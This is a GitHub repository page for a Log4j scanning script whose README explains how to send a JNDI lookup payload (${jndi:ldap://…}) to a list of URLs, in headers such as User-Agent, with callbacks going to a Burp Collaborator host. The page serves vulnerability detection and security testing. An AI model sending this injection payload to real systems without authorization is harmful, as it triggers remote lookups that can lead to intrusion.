Skip to content
/ Log4j-Detector Public template

This script will help you to automate exploit scanning againts a list of URL's

License

MIT license
5 stars 5 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

sherlocksecurity/Log4j-Detector

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
.github/workflows
.github/workflows
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
sherlock-exploit.py
sherlock-exploit.py
 
 

Repository files navigation

Log4j Detect-Automation

This script will help you to automate exploit Apache Log4j scanning againts a list of URL's

Installation

sudo apt install python3

Usage

python3 sherlock-exploit.py urls.txt <burpcolloborator URL

By default the tool will log the issues to Burp Suite, if you dont want to log just add comment to the proxy line.

#proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} this will disable the proxy

Output

The tool will send the ${jndi:ldap://<yourburpcollabURL>/sherlock} payload in various fields like user-agent, get and various fields. You can add more headers if you want.

Sample Testing

Screenshot 2021-12-13 at 11 50 42 AM

Screenshot 2021-12-13 at 11 51 53 AM

About

This script will help you to automate exploit scanning againts a list of URL's

Resources

Readme

License

MIT license
Activity

Stars

5 stars

Watchers

1 watching

Forks

5 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages